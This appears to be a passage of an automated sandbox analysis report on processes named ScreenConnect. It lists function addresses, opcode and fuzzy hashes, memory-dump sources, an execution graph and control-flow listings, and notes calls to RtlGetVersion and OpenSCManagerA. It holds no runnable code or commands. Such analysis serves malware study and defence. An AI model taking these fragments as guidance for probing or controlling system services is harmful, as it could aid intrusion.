                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f257148c3f94664154db2826f2e33d030ece2b46e2a0875152937680bb0153bd
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62012B71204340AAE7208F6ACC84B67BF9CEF453A4F18C41AED895B286C3799846C6B1
                                                                                                                                                                                                                                                          Function 016C12A0 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: c3c4263c04cf2c2484225c76fd4946a9cb46a196e292ebca8dd15d45040a236e
                                                                                                                                                                                                                                                          • Instruction ID: 73e17a3bc990c5d28f4896ea6a807b7cf94ba63c65047a321fcdb87bdc0c49dc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c3c4263c04cf2c2484225c76fd4946a9cb46a196e292ebca8dd15d45040a236e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC014935640341DFC7228A7C9C1046E3FB2EEC7620301816ED859C7346DB2D9C498B80
                                                                                                                                                                                                                                                          Function 016C8168 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 3f25db045948423e9273adbb0ddda5f89da1486947247bc9ffc9964e67048004
                                                                                                                                                                                                                                                          • Instruction ID: e13d3e39a617d82a327a86597541ae3ca084d58ab821474ef0507773e8f76472
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f25db045948423e9273adbb0ddda5f89da1486947247bc9ffc9964e67048004
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88F08C37B0C2146FD728CABEA80069BBBDECBD4224B14C07FE58DC3780E931A4018764
                                                                                                                                                                                                                                                          Function 016C5F68 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 6ae27d1c31cff579c8d5a6f9a78fc4bc6c8902b7b27df31c5693f121a65275bf
                                                                                                                                                                                                                                                          • Instruction ID: df332cf62e9140ce9a4d25500aeac227d696eb3217a324920aae62a5abc27150
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ae27d1c31cff579c8d5a6f9a78fc4bc6c8902b7b27df31c5693f121a65275bf
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0F0E221B0A2C22F9F1A862C1D14025BFE9C9468A032E82EAF476CF257E610EC058762
                                                                                                                                                                                                                                                          Function 0166D01C Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733554312.000000000166D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0166D000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_166d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: db672fa264fdcc75127a1830cee240e44fd3010793a9e0f76195dfa31f19ce21
                                                                                                                                                                                                                                                          • Instruction ID: 0cc15b60ddc261ccec2d0430fd9b476de4fffef84800d123bc0cc947f4b51c6a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db672fa264fdcc75127a1830cee240e44fd3010793a9e0f76195dfa31f19ce21
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2AF0C271104344AEEB208F1ACC84B62FF9CEF45264F18C95AED885A286C3799845CAB0
                                                                                                                                                                                                                                                          Function 016C1414 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: c40a4e901a5aef2fafe9dbe2adc660d11ef867456d80c605857417c35d69aa97
                                                                                                                                                                                                                                                          • Instruction ID: c80d083adfc991e0ee39ee39281327252eb4575ab269e51a8991c43ca1287091
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c40a4e901a5aef2fafe9dbe2adc660d11ef867456d80c605857417c35d69aa97
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44F046620083808FD322D72DAC112AD7FA1EBA366030800DED045CB667E259A90A8362
                                                                                                                                                                                                                                                          Function 016C0838 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 4add02c328282dedac208d32a292f420f4ca2717b1e4b7ae33f81f9c3027b804
                                                                                                                                                                                                                                                          • Instruction ID: 237e5282f5cec5000197f50f04bd76242ddb82df579458505bad689fa4c37c6d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4add02c328282dedac208d32a292f420f4ca2717b1e4b7ae33f81f9c3027b804
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76F02E34806286EFCB51CF6CAC001AE7BB5FA9222571182AEE008C3606D7354E12E791
                                                                                                                                                                                                                                                          Function 016C6EE8 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: ea4c5dde204cb40fd193c0540980ecf7607db55fd8421283b588f08c93546963
                                                                                                                                                                                                                                                          • Instruction ID: da106b8c3d7e89ef0b3010d82381dffb5b6f126aa342f567443b263f352a3295
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea4c5dde204cb40fd193c0540980ecf7607db55fd8421283b588f08c93546963
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6F0E5323083415FC7055F5AAC8C42ABEABEBC9A30704403EE11EC7340CE719C098395
                                                                                                                                                                                                                                                          Function 016C8161 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: e7656d49cd8ab335650572378ab51e3af27868b8f3a7994db51ad3334dc94806
                                                                                                                                                                                                                                                          • Instruction ID: ab2cabdb3745d05b216a729d58a3cc47888baca3a1cdc8ff0cc4603a6af63959
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7656d49cd8ab335650572378ab51e3af27868b8f3a7994db51ad3334dc94806
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26E09272A483106FD758CAB9A8005AB7BDDCBD5220700C07F904DC3240EA3495018724
                                                                                                                                                                                                                                                          Function 016C12B0 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: e32a76177dffe8f584fb83ea31c89bab8b7c7520f61eb1ae189035c43acabfae
                                                                                                                                                                                                                                                          • Instruction ID: 0602a8ef98f6bdbff3c49c77cbe0c364a10248f9c437680adad85808947d47eb
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e32a76177dffe8f584fb83ea31c89bab8b7c7520f61eb1ae189035c43acabfae
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FF0653534071AAB87219A6EED1056F779AEBC5A60300802DE929CB314EF39EC958BD0
                                                                                                                                                                                                                                                          Function 016C1DF9 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 3d4a917424fc553ccb40acf8dac0cef152db94ddcc972be9959f407a84d02cdf
                                                                                                                                                                                                                                                          • Instruction ID: 4348dd40067883b0fdd586a5e259497d88d8d55cb7a2ecb4aef805b276c11839
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d4a917424fc553ccb40acf8dac0cef152db94ddcc972be9959f407a84d02cdf
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21F0A07040A289AFCB02DB78DD5564EBFB4EF4310070580EAD848CB253EA301E08D762
                                                                                                                                                                                                                                                          Function 016C6EF8 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: d8d1d912366ab25bbdcaf28ffe6f001bfafb3814d110d8254cfb9dca7025cd6c
                                                                                                                                                                                                                                                          • Instruction ID: 46c5cbdd6bdf567a6f003758c1d31ebfc681c874c4d13224ac0d11b999371ee7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8d1d912366ab25bbdcaf28ffe6f001bfafb3814d110d8254cfb9dca7025cd6c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69E01A31304215AB96145A9AA88C53ABADAEBC9A71754403EE60AC3340DEB19C0A87A9
                                                                                                                                                                                                                                                          Function 016C13D0 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: e3a9fcfdc5360023b15515a969ab991484873f6635c75f54bd54ef099016a5d3
                                                                                                                                                                                                                                                          • Instruction ID: c145967745d7cb257f7e74d88f87f413cb8ff7bf89d4beba61508bbece8dbc76
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e3a9fcfdc5360023b15515a969ab991484873f6635c75f54bd54ef099016a5d3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4E0E53110C7814FC332D72CE8402DD7BF1EF9762030909EEE0858B697D7696C4983A6
                                                                                                                                                                                                                                                          Function 016C5F78 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: c4feeb958ac58c7bc26e03764a19e75446f788d534420c5152dedee7905eb95e
                                                                                                                                                                                                                                                          • Instruction ID: 3593a9d092132fb6e0e492498d33d8711c82b57249354d683c5a3c9109b9e8fc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4feeb958ac58c7bc26e03764a19e75446f788d534420c5152dedee7905eb95e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98E02632B004135B8B08851C9C04130B7CACB8866473C8539F43ACB341FA21EC024B80
                                                                                                                                                                                                                                                          Function 016C1310 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 88b29c9925185c9196df052cdfe4bf7203469f4b69ec8e2f3bc4513ace8b821a
                                                                                                                                                                                                                                                          • Instruction ID: 56f591c83f43f0e9eb5107aceb755b0711ca2784832899b1c10220342d160c5d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 88b29c9925185c9196df052cdfe4bf7203469f4b69ec8e2f3bc4513ace8b821a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8E09AB1E51204AFCB84DF7889151AEBBF0EB5A214B1486AEC41DD6641E6369613CB81
                                                                                                                                                                                                                                                          Function 016C1DB0 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: c3d8a7642696bc075187b1fb874f20e7cac827265e0f79d9eed6282b39748a89
                                                                                                                                                                                                                                                          • Instruction ID: da6566d4aa00d14faec94cfb69d5b8f4fc3318a5e0f8f95d67e7318984081817
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c3d8a7642696bc075187b1fb874f20e7cac827265e0f79d9eed6282b39748a89
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6E08C3A7001155BC3586A7DFC1C86E7AEAEBC9631310412AF50AC33E4CF708C12CBA5
                                                                                                                                                                                                                                                          Function 016C0848 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 4bde02de0cc06bcf2ebe78f1acf058baf6b84e565658090d3f58bf40a98d5e1d
                                                                                                                                                                                                                                                          • Instruction ID: 47fd3db261682e1aaca78ea4cfaebabe0bfec6ab9836bef59b84d5584a51cd71
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bde02de0cc06bcf2ebe78f1acf058baf6b84e565658090d3f58bf40a98d5e1d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13D01730A0120EFF8B00DFB8EE0555EBBB9EB44201B1045A8D808D3304EA312E549B91
                                                                                                                                                                                                                                                          Function 016C1E08 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: c7eab70127784187043acf4e01da094988217cc1403793351b6f1a1fa28653a8
                                                                                                                                                                                                                                                          • Instruction ID: dc59c02d142ee9da709414ceed45cc32e3011a8344443f009fb1986bb26aad1d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7eab70127784187043acf4e01da094988217cc1403793351b6f1a1fa28653a8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9ED0127090110DEF9B40DFB4ED4565EB7B9EB45200B1041A9E808D3250EA315E049B50

                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                          Execution Coverage:10.8%
                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                          Signature Coverage:31.2%
                                                                                                                                                                                                                                                          Total number of Nodes:16
                                                                                                                                                                                                                                                          Total number of Limit Nodes:1
                                                                                                                                                                                                                                                          execution_graph 16244 8836b0 16245 8836c6 16244->16245 16248 884c71 16245->16248 16246 8836cc 16249 884c90 16248->16249 16250 884d1d RtlGetVersion 16249->16250 16252 884cc6 16249->16252 16251 884dda 16250->16251 16251->16246 16252->16246 16253 54d1230 16256 54d1358 16253->16256 16260 54d13dc 16256->16260 16264 54d13e8 16256->16264 16261 54d1443 OpenSCManagerA 16260->16261 16263 54d152b 16261->16263 16265 54d1443 OpenSCManagerA 16264->16265 16267 54d152b 16265->16267

                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                          Function 00884C71 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 104COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 0 884c71-884cb3 5 884d02-884d08 0->5 6 884cb5-884cc4 call 884830 0->6 9 884d09-884dd8 RtlGetVersion 6->9 10 884cc6-884ccb 6->10 15 884dda-884de0 9->15 16 884de1-884e24 9->16 22 884cce call 884ee8 10->22 23 884cce call 884ef8 10->23 12 884cd4 12->5 15->16 20 884e2b-884e32 16->20 21 884e26 16->21 21->20 22->12 23->12
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlGetVersion.NTDLL(0000009C), ref: 00884DBE
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1790495871.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_880000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Version
                                                                                                                                                                                                                                                          • String ID: `Q_q$`Q_q
                                                                                                                                                                                                                                                          • API String ID: 1889659487-1312627481
                                                                                                                                                                                                                                                          • Opcode ID: c8fc1fc2e2d9848d446febc6a31d89141ff9d84c2a53ec180da46cb0763448b9
                                                                                                                                                                                                                                                          • Instruction ID: 20219d370ed8d6098f983faaadcdc9014a978f5125911f08bcd80642422fd363
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8fc1fc2e2d9848d446febc6a31d89141ff9d84c2a53ec180da46cb0763448b9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E41CE71A002199FDB60EF64D808BADBBB5FB49300F0085E9D50CA7281DB785E49CF92
                                                                                                                                                                                                                                                          Function 054D13DC Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 171 54d13dc-54d1441 172 54d147a-54d1498 171->172 173 54d1443-54d144d 171->173 178 54d149a-54d14a4 172->178 179 54d14d1-54d1529 OpenSCManagerA 172->179 173->172 174 54d144f-54d1451 173->174 176 54d1474-54d1477 174->176 177 54d1453-54d145d 174->177 176->172 180 54d145f 177->180 181 54d1461-54d1470 177->181 178->179 183 54d14a6-54d14a8 178->183 189 54d152b-54d1531 179->189 190 54d1532-54d156a 179->190 180->181 181->181 182 54d1472 181->182 182->176 184 54d14cb-54d14ce 183->184 185 54d14aa-54d14b4 183->185 184->179 187 54d14b8-54d14c7 185->187 188 54d14b6 185->188 187->187 191 54d14c9 187->191 188->187 189->190 195 54d156c-54d1570 190->195 196 54d157a-54d157e 190->196 191->184 195->196 197 54d1572 195->197 198 54d158e 196->198 199 54d1580-54d1584 196->199 197->196 201 54d158f 198->201 199->198 200 54d1586 199->200 200->198 201->201
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • OpenSCManagerA.SECHOST(?,?,?), ref: 054D1513
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1801216537.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_54d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ManagerOpen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1889721586-0
                                                                                                                                                                                                                                                          • Opcode ID: 79753af486148c489218b8ce895bfdfea9edfd782d8e289c3be22f0a2c6bd6f7
                                                                                                                                                                                                                                                          • Instruction ID: 2d10ccf68d026322d0e5a325b5f014da24a148b38a9f7483d88af9e9f6db13d7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79753af486148c489218b8ce895bfdfea9edfd782d8e289c3be22f0a2c6bd6f7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 495125B1D006599FDB14CFA8C9A57EEFBB1BB08310F14852AEC56E7380D7749881CB91
                                                                                                                                                                                                                                                          Function 054D13E8 Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 202 54d13e8-54d1441 203 54d147a-54d1498 202->203 204 54d1443-54d144d 202->204 209 54d149a-54d14a4 203->209 210 54d14d1-54d1529 OpenSCManagerA 203->210 204->203 205 54d144f-54d1451 204->205 207 54d1474-54d1477 205->207 208 54d1453-54d145d 205->208 207->203 211 54d145f 208->211 212 54d1461-54d1470 208->212 209->210 214 54d14a6-54d14a8 209->214 220 54d152b-54d1531 210->220 221 54d1532-54d156a 210->221 211->212 212->212 213 54d1472 212->213 213->207 215 54d14cb-54d14ce 214->215 216 54d14aa-54d14b4 214->216 215->210 218 54d14b8-54d14c7 216->218 219 54d14b6 216->219 218->218 222 54d14c9 218->222 219->218 220->221 226 54d156c-54d1570 221->226 227 54d157a-54d157e 221->227 222->215 226->227 228 54d1572 226->228 229 54d158e 227->229 230 54d1580-54d1584 227->230 228->227 232 54d158f 229->232 230->229 231 54d1586 230->231 231->229 232->232
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • OpenSCManagerA.SECHOST(?,?,?), ref: 054D1513
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1801216537.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_54d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ManagerOpen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1889721586-0
                                                                                                                                                                                                                                                          • Opcode ID: 1e7236f41b666cd9d5490065226a46ff8d8c9548fd6453593cc2659e4c88f259
                                                                                                                                                                                                                                                          • Instruction ID: 615d13adb7e8a5c454e8fa080fb7227a45536d8ce3a648075e9d4dddfad259bb
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e7236f41b666cd9d5490065226a46ff8d8c9548fd6453593cc2659e4c88f259
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC5116B1D002599FDB14DFA8C9A57EEFBB1FB08314F14816AEC56A7340D7749881CBA1
